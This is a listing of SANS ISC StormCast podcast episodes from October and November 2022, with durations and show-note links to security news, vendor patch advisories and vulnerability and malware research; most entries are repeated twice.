Evil Maid Attacks - Remediation for the Cheap https://isc.sans.edu/diary/Evil%20Maid%20Attacks%20-%20Remediation%20for%20the%20Cheap/29256 F5 Big IP CVE-2022-41622 and CVE-2022-41800 Vulnerability Details https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/ Details about iPad/iOS Neural Engine Vulnerability CVE-2022-32899 https://github.com/0x36/weightBufs/ Disneyland Malware Team: It's a Puny World After All https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/#more-61870
11/17/20226 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, November 16th, 2022

Packet Tuesday https://packettuesday.com Stealing Passwords From Infosec Mastodon - Without Bypassing CSP https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp SQLi and Access Flaws in Zendesk https://www.varonis.com/blog/zendesk-sql-injection-and-access-flaws Electric Vehicle Charging Infrastructure https://newsreleases.sandia.gov/ev_security/
11/16/20225 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, November 16th, 2022

Packet Tuesday https://packettuesday.com Stealing Passwords From Infosec Mastodon - Without Bypassing CSP https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp SQLi and Access Flaws in Zendesk https://www.varonis.com/blog/zendesk-sql-injection-and-access-flaws Electric Vehicle Charging Infrastructure https://newsreleases.sandia.gov/ev_security/
11/16/20225 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, November 15th, 2022

Extracting "HTTP CONNECT" Requests with Python https://isc.sans.edu/diary/Extracting%20%27HTTP%20CONNECT%27%20Requests%20with%20Python/29246 Windows Kerberos Authentication Breaks After November Updates https://www.bleepingcomputer.com/news/microsoft/windows-kerberos-authentication-breaks-after-november-updates/ https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-22h2#2953msgdesc Cookies for MFA Bypass Gain Traction Among Cyberattackers https://www.darkreading.com/threat-intelligence/cookies-mfa-bypass-cyberattackers
11/15/20225 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, November 15th, 2022

Extracting "HTTP CONNECT" Requests with Python https://isc.sans.edu/diary/Extracting%20%27HTTP%20CONNECT%27%20Requests%20with%20Python/29246 Windows Kerberos Authentication Breaks After November Updates https://www.bleepingcomputer.com/news/microsoft/windows-kerberos-authentication-breaks-after-november-updates/ https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-22h2#2953msgdesc Cookies for MFA Bypass Gain Traction Among Cyberattackers https://www.darkreading.com/threat-intelligence/cookies-mfa-bypass-cyberattackers
11/15/20225 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, November 14th, 2022

Extracting Information From "logfmt" Files with CyberChef https://isc.sans.edu/diary/Extracting%20Information%20From%20%22logfmt%22%20Files%20With%20CyberChef/29244 Soccer Worldcup Risks https://www.theregister.com/2022/11/11/world_cup_security/ https://www.welivesecurity.com/2022/11/11/fifa-world-cup-2022-scams-fake-lotteries-ticket-fraud/ Mysterious Company With Government Ties Plays Key Internet Role https://www.washingtonpost.com/technology/2022/11/08/trustcor-internet-addresses-government-connections/ Extortion Scams Hit Website Owners https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-damage-sites-reputation-leak-data/
11/14/20226 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, November 14th, 2022

Extracting Information From "logfmt" Files with CyberChef https://isc.sans.edu/diary/Extracting%20Information%20From%20%22logfmt%22%20Files%20With%20CyberChef/29244 Soccer Worldcup Risks https://www.theregister.com/2022/11/11/world_cup_security/ https://www.welivesecurity.com/2022/11/11/fifa-world-cup-2022-scams-fake-lotteries-ticket-fraud/ Mysterious Company With Government Ties Plays Key Internet Role https://www.washingtonpost.com/technology/2022/11/08/trustcor-internet-addresses-government-connections/ Extortion Scams Hit Website Owners https://www.bleepingcomputer.com/news/security/new-extortion-scam-threatens-to-damage-sites-reputation-leak-data/
11/14/20226 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, November 11th, 2022

Do you collect "Observables" or "IOCs" https://isc.sans.edu/diary/Do%20you%20collect%20%22Observables%22%20or%20%22IOCs%22%3F/29238 Android Update fixes Lock Screen Bypass https://source.android.com/docs/security/bulletin/2022-11-01 https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/ libxml Vulnerability Details https://gitlab.gnome.org/GNOME/libxml2/-/issues/381 CVE-2022-45063: xterm remote code execution vulnerability https://www.openwall.com/lists/oss-security/2022/11/10/1
11/11/20226 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, November 11th, 2022

Do you collect "Observables" or "IOCs" https://isc.sans.edu/diary/Do%20you%20collect%20%22Observables%22%20or%20%22IOCs%22%3F/29238 Android Update fixes Lock Screen Bypass https://source.android.com/docs/security/bulletin/2022-11-01 https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/ libxml Vulnerability Details https://gitlab.gnome.org/GNOME/libxml2/-/issues/381 CVE-2022-45063: xterm remote code execution vulnerability https://www.openwall.com/lists/oss-security/2022/11/10/1
11/11/20226 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, November 10th, 2022

Another Script-Based Ransomware https://isc.sans.edu/diary/Another%20Script-Based%20Ransomware/29234 Apple Security Updates https://support.apple.com/en-us/HT201222 Lenovo UEFI Patch https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/ FoxIT Update https://www.foxit.com/support/security-bulletins.html SAP Update https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10
11/10/20225 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, November 10th, 2022

Another Script-Based Ransomware https://isc.sans.edu/diary/Another%20Script-Based%20Ransomware/29234 Apple Security Updates https://support.apple.com/en-us/HT201222 Lenovo UEFI Patch https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/ FoxIT Update https://www.foxit.com/support/security-bulletins.html SAP Update https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10
11/10/20225 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, November 9th, 2022

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20November%202022%20Patch%20Tuesday/29230 VMWare Workspace One Updates CVE-2022-31686, CVE-2022-31687, CVE-2022-31688 https://www.vmware.com/security/advisories/VMSA-2022-0028.html Citrix Gateway / Citrix ADC Vulnerabilities CVE-2022-27510 https://support.citrix.com/article/CTX463706/citrix-gateway-and-citrix-adc-security-bulletin-for-cve202227510-cve202227513-and-cve202227516 Microsoft Exchange Updates https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045
11/9/20227 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, November 9th, 2022

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20November%202022%20Patch%20Tuesday/29230 VMWare Workspace One Updates CVE-2022-31686, CVE-2022-31687, CVE-2022-31688 https://www.vmware.com/security/advisories/VMSA-2022-0028.html Citrix Gateway / Citrix ADC Vulnerabilities CVE-2022-27510 https://support.citrix.com/article/CTX463706/citrix-gateway-and-citrix-adc-security-bulletin-for-cve202227510-cve202227513-and-cve202227516 Microsoft Exchange Updates https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/ https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045
11/9/20227 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, November 8th, 2022

IPv4 Address Representations https://isc.sans.edu/diary/IPv4%20Address%20Representations/29224 Azure AD Certificate-based Authentication (CBA) on Mobile https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/azure-ad-certificate-based-authentication-cba-on-mobile/ba-p/2365672 Twitter Scams https://nakedsecurity.sophos.com/2022/11/04/twitter-blue-badge-email-scams-dont-fall-for-them/ Facebook Personal Information Removal https://www.facebook.com/contacts/removal RSA Conference Finds Unencrypted Confidential Data in WiFi Traffic https://www.darkreading.com/remote-workforce/unencrypted-traffic-weak-e-mail-passwords-still-undermining-wifi-security
11/8/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, November 8th, 2022

IPv4 Address Representations https://isc.sans.edu/diary/IPv4%20Address%20Representations/29224 Azure AD Certificate-based Authentication (CBA) on Mobile https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/azure-ad-certificate-based-authentication-cba-on-mobile/ba-p/2365672 Twitter Scams https://nakedsecurity.sophos.com/2022/11/04/twitter-blue-badge-email-scams-dont-fall-for-them/ Facebook Personal Information Removal https://www.facebook.com/contacts/removal RSA Conference Finds Unencrypted Confidential Data in WiFi Traffic https://www.darkreading.com/remote-workforce/unencrypted-traffic-weak-e-mail-passwords-still-undermining-wifi-security
11/8/20226 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, November 7th, 2022

Remcos Downloader With Unicode Obfuscation https://isc.sans.edu/diary/Remcos%20Downloader%20with%20Unicode%20Obfuscation/29220 Windows Malware With VHD Extension https://isc.sans.edu/diary/Windows%20Malware%20with%20VHD%20Extension/29222 PyPi Packages Attempting to Deliver w4sp Stealer https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack
11/7/20225 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, November 7th, 2022

Remcos Downloader With Unicode Obfuscation https://isc.sans.edu/diary/Remcos%20Downloader%20with%20Unicode%20Obfuscation/29220 Windows Malware With VHD Extension https://isc.sans.edu/diary/Windows%20Malware%20with%20VHD%20Extension/29222 PyPi Packages Attempting to Deliver w4sp Stealer https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack
11/7/20225 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, November 4th, 2022

Breakpoints in Burp https://isc.sans.edu/forums/diary/Breakpoints%20in%20Burp/29214/ TA569 Supply Chain Attack Injects JavaScript https://twitter.com/threatinsight/status/1587865920130752515 https://www.darkreading.com/application-security/supply-chain-attack-pushes-out-malware-to-more-than-250-media-websites Link to old story similar to the above JavaScript injection https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/ Hitachi Infrastructure Analytics Advisor https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2022-134/index.html FortiNet Patches https://fortiguard.fortinet.com/psirt?date=11-2022 Nessus Patches https://www.tenable.com/security/tns-2022-24
11/4/20226 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, November 4th, 2022

Breakpoints in Burp https://isc.sans.edu/forums/diary/Breakpoints%20in%20Burp/29214/ TA569 Supply Chain Attack Injects JavaScript https://twitter.com/threatinsight/status/1587865920130752515 https://www.darkreading.com/application-security/supply-chain-attack-pushes-out-malware-to-more-than-250-media-websites Link to old story similar to the above JavaScript injection https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/ Hitachi Infrastructure Analytics Advisor https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2022-134/index.html FortiNet Patches https://fortiguard.fortinet.com/psirt?date=11-2022 Nessus Patches https://www.tenable.com/security/tns-2022-24
11/4/20226 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, November 3rd, 2022

Who Put the "Dark" in DarkVNC? https://isc.sans.edu/forums/diary/Who+put+the+Dark+in+DarkVNC/29210 sigstore General Availability https://openssf.org/press-release/2022/10/25/sigstore-announces-general-availability-at-sigstorecon/ https://github.blog/2022-10-25-why-were-excited-about-the-sigstore-general-availability/ URLScan.io's SOAR Spot: Chatty Security Tools Leaking Private Data https://positive.security/blog/urlscan-data-leaks Checkmk: Remote Code Execution by Chaining Multiple Bugs https://blog.sonarsource.com/checkmk-rce-chain-1/
11/3/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, November 3rd, 2022

Who Put the "Dark" in DarkVNC? https://isc.sans.edu/forums/diary/Who+put+the+Dark+in+DarkVNC/29210 sigstore General Availability https://openssf.org/press-release/2022/10/25/sigstore-announces-general-availability-at-sigstorecon/ https://github.blog/2022-10-25-why-were-excited-about-the-sigstore-general-availability/ URLScan.io's SOAR Spot: Chatty Security Tools Leaking Private Data https://positive.security/blog/urlscan-data-leaks Checkmk: Remote Code Execution by Chaining Multiple Bugs https://blog.sonarsource.com/checkmk-rce-chain-1/
11/3/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, November 2nd, 2022

OpenSSL 3.0 Punycode Vulnerability Fix https://isc.sans.edu/forums/diary/Critical+OpenSSL+30+Update+Released+Patches+CVE20223786+CVE20223602/29208 https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/
11/2/20228 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, November 2nd, 2022

OpenSSL 3.0 Punycode Vulnerability Fix https://isc.sans.edu/forums/diary/Critical+OpenSSL+30+Update+Released+Patches+CVE20223786+CVE20223602/29208 https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/
11/2/20228 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, November 1st, 2022

NMAP without NMAP - Port Testing and Scanning with PowerShell https://isc.sans.edu/diary/NMAP+without+NMAP+Port+Testing+and+Scanning+with+PowerShell/29202 ConnectWise Recover and R1Soft Server Backup Critical Vulnerability https://www.connectwise.com/company/trust/security-bulletins/r1soft-and-recover-security-bulletin Google Chrome 0-Day Patch https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html LODEINFO 2022 Abusing Security Software https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/ Spring Security Vulnerability https://tanzu.vmware.com/security/cve-2022-31692
11/1/20226 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, November 1st, 2022

NMAP without NMAP - Port Testing and Scanning with PowerShell https://isc.sans.edu/diary/NMAP+without+NMAP+Port+Testing+and+Scanning+with+PowerShell/29202 ConnectWise Recover and R1Soft Server Backup Critical Vulnerability https://www.connectwise.com/company/trust/security-bulletins/r1soft-and-recover-security-bulletin Google Chrome 0-Day Patch https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html LODEINFO 2022 Abusing Security Software https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/ Spring Security Vulnerability https://tanzu.vmware.com/security/cve-2022-31692
11/1/20226 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, October 31st, 2022

Supersizing you DUO and 365 Integration https://isc.sans.edu/forums/diary/Supersizing%20your%20DUO%20and%20365%20Integration/29194/ TCP/IP Vulnerability CVE-2022 34718 PoC Restoration and Analysis https://medium.com/numen-cyber-labs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf Juniper SSLVON / JunOS RCE Vulnerabilities https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/ Raspberry Robin Update https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
10/31/20225 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, October 31st, 2022

Supersizing you DUO and 365 Integration https://isc.sans.edu/forums/diary/Supersizing%20your%20DUO%20and%20365%20Integration/29194/ TCP/IP Vulnerability CVE-2022 34718 PoC Restoration and Analysis https://medium.com/numen-cyber-labs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf Juniper SSLVON / JunOS RCE Vulnerabilities https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/ Raspberry Robin Update https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
10/31/20225 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, October 28th, 2022

Upcoming Critical OpenSSL Vulnerability: What will be Affected? https://isc.sans.edu/forums/diary/Upcoming+Critical+OpenSSL+Vulnerability+What+will+be+Affected/29192 Apple Updates https://support.apple.com/en-us/HT201222 Fodcha Botnet Reaches 1Tbps https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/ https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/
10/28/20225 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, October 28th, 2022

Upcoming Critical OpenSSL Vulnerability: What will be Affected? https://isc.sans.edu/forums/diary/Upcoming+Critical+OpenSSL+Vulnerability+What+will+be+Affected/29192 Apple Updates https://support.apple.com/en-us/HT201222 Fodcha Botnet Reaches 1Tbps https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/ https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/
10/28/20225 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, October 27th, 2022

Why is My Cat Using Baidu And Other IoT DNS Oddities https://isc.sans.edu/forums/diary/Why+is+My+Cat+Using+Baidu+And+Other+IoT+DNS+Oddities/29188 OpenSSL Critical Flaw to Be Patched https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html MacOS Ventura Blocks Security Tools https://www.wired.com/story/apple-macos-ventura-bug-security-tools/ Critical VMWare Security Tools https://www.vmware.com/security/advisories/VMSA-2022-0027.html
10/27/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, October 27th, 2022

Why is My Cat Using Baidu And Other IoT DNS Oddities https://isc.sans.edu/forums/diary/Why+is+My+Cat+Using+Baidu+And+Other+IoT+DNS+Oddities/29188 OpenSSL Critical Flaw to Be Patched https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html MacOS Ventura Blocks Security Tools https://www.wired.com/story/apple-macos-ventura-bug-security-tools/ Critical VMWare Security Tools https://www.vmware.com/security/advisories/VMSA-2022-0027.html
10/27/20226 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, October 26th, 2022

Massing Cryptomining Operation via Github Actions https://sysdig.com/blog/massive-cryptomining-operation-github-actions/ Daixin Team Ransomware Targeting Healthcare Providers https://www.ic3.gov/Media/News/2022/221021.pdf Cisco Anyconnect Client Exploited in the Wild https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj SQLite Vulnerability Details https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/
10/26/20225 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, October 26th, 2022

Massing Cryptomining Operation via Github Actions https://sysdig.com/blog/massive-cryptomining-operation-github-actions/ Daixin Team Ransomware Targeting Healthcare Providers https://www.ic3.gov/Media/News/2022/221021.pdf Cisco Anyconnect Client Exploited in the Wild https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-F26WwJW https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj SQLite Vulnerability Details https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/
10/26/20225 minutes, 53 seconds
Episode Artwork

ISC StormCast for Tuesday, October 25th, 2022

C2 Communications Through Outlook.com https://isc.sans.edu/forums/diary/C2+Communications+Through+outlookcom/29180 Apple Patches Everything October 2022 Edition https://isc.sans.edu/forums/diary/Apple%20Patches%20Everything%3A%20October%202022%20Edition/29182/ Cisco ISE Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-path-trav-Dz5dpzyM Dormant Colors Live Campaign With Over 1m Data Stealing Extensions Installed https://guardiosecurity.medium.com/dormant-colors-live-campaign-with-over-1m-data-stealing-extensions-installed-9a9a459b5849
10/25/20226 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, October 25th, 2022

C2 Communications Through Outlook.com https://isc.sans.edu/forums/diary/C2+Communications+Through+outlookcom/29180 Apple Patches Everything October 2022 Edition https://isc.sans.edu/forums/diary/Apple%20Patches%20Everything%3A%20October%202022%20Edition/29182/ Cisco ISE Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-path-trav-Dz5dpzyM Dormant Colors Live Campaign With Over 1m Data Stealing Extensions Installed https://guardiosecurity.medium.com/dormant-colors-live-campaign-with-over-1m-data-stealing-extensions-installed-9a9a459b5849
10/25/20226 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, October 24th, 2022

Sczriptzzbn Inject Pushes Malware for NetSupport RAT https://isc.sans.edu/forums/diary/sczriptzzbn%20inject%20pushes%20malware%20for%20NetSupport%20RAT/29170/ rtfdump find options https://isc.sans.edu/forums/diary/rtfdumps+Find+Option/29174 Exploited Windows Zero Day Lets JavaScript Files Bypass Security Warnings https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/ A study of malicious CVE proof of concept exploits in GitHub https://arxiv.org/pdf/2210.08374.pdf F5 Patches https://support.f5.com/csp/article/K11830089 https://support.f5.com/csp/article/K30425568 Synology Updates https://www.synology.com/en-global/security/advisory/Synology_SA_22_17
10/24/20226 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, October 24th, 2022

Sczriptzzbn Inject Pushes Malware for NetSupport RAT https://isc.sans.edu/forums/diary/sczriptzzbn%20inject%20pushes%20malware%20for%20NetSupport%20RAT/29170/ rtfdump find options https://isc.sans.edu/forums/diary/rtfdumps+Find+Option/29174 Exploited Windows Zero Day Lets JavaScript Files Bypass Security Warnings https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/ A study of malicious CVE proof of concept exploits in GitHub https://arxiv.org/pdf/2210.08374.pdf F5 Patches https://support.f5.com/csp/article/K11830089 https://support.f5.com/csp/article/K30425568 Synology Updates https://www.synology.com/en-global/security/advisory/Synology_SA_22_17
10/24/20226 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, October 21st, 2022

Forensic Value of Prefetch https://isc.sans.edu/forums/diary/Forensic%20Value%20of%20Prefetch/29168/ Microsoft TLS Fix https://support.microsoft.com/en-us/topic/october-17-2022-kb5020435-os-builds-19042-2132-19043-2132-and-19044-2132-out-of-band-243f34de-2f44-4015-a224-1b68a4132ca5 CISA Releases ScubaGear to Audit M365 https://github.com/cisagov/ScubaGear HTTP/3 Connection Contamination https://portswigger.net/research/http-3-connection-contamination
10/21/20225 minutes, 54 seconds
Episode Artwork

ISC StormCast for Friday, October 21st, 2022

Forensic Value of Prefetch https://isc.sans.edu/forums/diary/Forensic%20Value%20of%20Prefetch/29168/ Microsoft TLS Fix https://support.microsoft.com/en-us/topic/october-17-2022-kb5020435-os-builds-19042-2132-19043-2132-and-19044-2132-out-of-band-243f34de-2f44-4015-a224-1b68a4132ca5 CISA Releases ScubaGear to Audit M365 https://github.com/cisagov/ScubaGear HTTP/3 Connection Contamination https://portswigger.net/research/http-3-connection-contamination
10/21/20225 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, October 20th, 2022

Are Internet Scanning Services Good or Bad for You? https://isc.sans.edu/forums/diary/Are+Internet+Scanning+Services+Good+or+Bad+for+You/29164 FBI Warns of Student Loan Foregiveness Scams https://www.ic3.gov/Media/Y2022/PSA221018 Fully Undetectable Powershell Backdoor https://www.safebreach.com/resources/blog/safebreach-labs-researchers-uncover-new-fully-undetectable-powershell-backdoor/
10/20/20226 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, October 20th, 2022

Are Internet Scanning Services Good or Bad for You? https://isc.sans.edu/forums/diary/Are+Internet+Scanning+Services+Good+or+Bad+for+You/29164 FBI Warns of Student Loan Foregiveness Scams https://www.ic3.gov/Media/Y2022/PSA221018 Fully Undetectable Powershell Backdoor https://www.safebreach.com/resources/blog/safebreach-labs-researchers-uncover-new-fully-undetectable-powershell-backdoor/
10/20/20226 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, October 19th, 2022

Python Obfuscation for Dummies https://isc.sans.edu/forums/diary/Python%20Obfuscation%20for%20Dummies/29160/ Oracle October 2022 Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2022.html Weak Encryption in Microsoft Office 365 https://labs.withsecure.com/advisories/microsoft-office-365-message-encryption-insecure-mode-of-operation Tesla 3 Hack https://www.synacktiv.com/sites/default/files/2022-10/tesla_hexacon.pdf
10/19/20225 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, October 19th, 2022

Python Obfuscation for Dummies https://isc.sans.edu/forums/diary/Python%20Obfuscation%20for%20Dummies/29160/ Oracle October 2022 Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2022.html Weak Encryption in Microsoft Office 365 https://labs.withsecure.com/advisories/microsoft-office-365-message-encryption-insecure-mode-of-operation Tesla 3 Hack https://www.synacktiv.com/sites/default/files/2022-10/tesla_hexacon.pdf
10/19/20225 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, October 18th, 2022

Fileless Powershell Dropper https://isc.sans.edu/forums/diary/Fileless%20Powershell%20Dropper/29156/ Apache Commons Text Vulnerablity https://www.openwall.com/lists/oss-security/2022/10/13/4 How a Microsoft Blunder Opened Millions of PCs to Potent Malware Attacks https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/
10/18/20226 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, October 18th, 2022

Fileless Powershell Dropper https://isc.sans.edu/forums/diary/Fileless%20Powershell%20Dropper/29156/ Apache Commons Text Vulnerablity https://www.openwall.com/lists/oss-security/2022/10/13/4 How a Microsoft Blunder Opened Millions of PCs to Potent Malware Attacks https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/
10/18/20226 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, October 17th, 2022

Horizon3 Publishes FortiOS Vulnerablity Details and Exploit https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/ More Exchange Vulnerability Workaround Bypasses https://twitter.com/wdormann/status/1576922677675102208 Analysis of a Malicious HTML File and QBot https://isc.sans.edu/forums/diary/Analysis+of+a+Malicious+HTML+File+QBot/29146 End of Life VMWare ESXi Versions https://www.lansweeper.com/eol/vmware-esxi-end-of-life/
10/17/20225 minutes, 58 seconds
Episode Artwork

ISC StormCast for Monday, October 17th, 2022

Horizon3 Publishes FortiOS Vulnerablity Details and Exploit https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/ More Exchange Vulnerability Workaround Bypasses https://twitter.com/wdormann/status/1576922677675102208 Analysis of a Malicious HTML File and QBot https://isc.sans.edu/forums/diary/Analysis+of+a+Malicious+HTML+File+QBot/29146 End of Life VMWare ESXi Versions https://www.lansweeper.com/eol/vmware-esxi-end-of-life/
10/17/20225 minutes, 58 seconds
Episode Artwork

ISC StormCast for Friday, October 14th, 2022

Alchimist Offensive Framework https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html#more VM2 Sandbox Vulnerability https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067 private npm package disclosure https://blog.aquasec.com/private-packages-disclosed-via-timing-attack-on-npm Zimbra Updates https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27#Security_Fixes
10/14/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, October 14th, 2022

Alchimist Offensive Framework https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html#more VM2 Sandbox Vulnerability https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067 private npm package disclosure https://blog.aquasec.com/private-packages-disclosed-via-timing-attack-on-npm Zimbra Updates https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27#Security_Fixes
10/14/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, October 13th, 2022

Adobe October Patch Tuesday https://helpx.adobe.com/sa_en/security/security-bulletin.html Fortinet Guidance https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ https://isc.sans.edu/forums/diary/Scans+for+old+Fortigate+Vulnerability+Building+Target+Lists/29142 Android VPN Issues https://mullvad.net/en/blog/2022/10/10/android-leaks-connectivity-check-traffic/ iOS VPN Issues https://9to5mac.com/2022/10/12/ios-vpn-apps-2/ Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-015.txt
10/13/20225 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, October 13th, 2022

Adobe October Patch Tuesday https://helpx.adobe.com/sa_en/security/security-bulletin.html Fortinet Guidance https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ https://isc.sans.edu/forums/diary/Scans+for+old+Fortigate+Vulnerability+Building+Target+Lists/29142 Android VPN Issues https://mullvad.net/en/blog/2022/10/10/android-leaks-connectivity-check-traffic/ iOS VPN Issues https://9to5mac.com/2022/10/12/ios-vpn-apps-2/ Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-015.txt
10/13/20225 minutes, 3 seconds
Episode Artwork

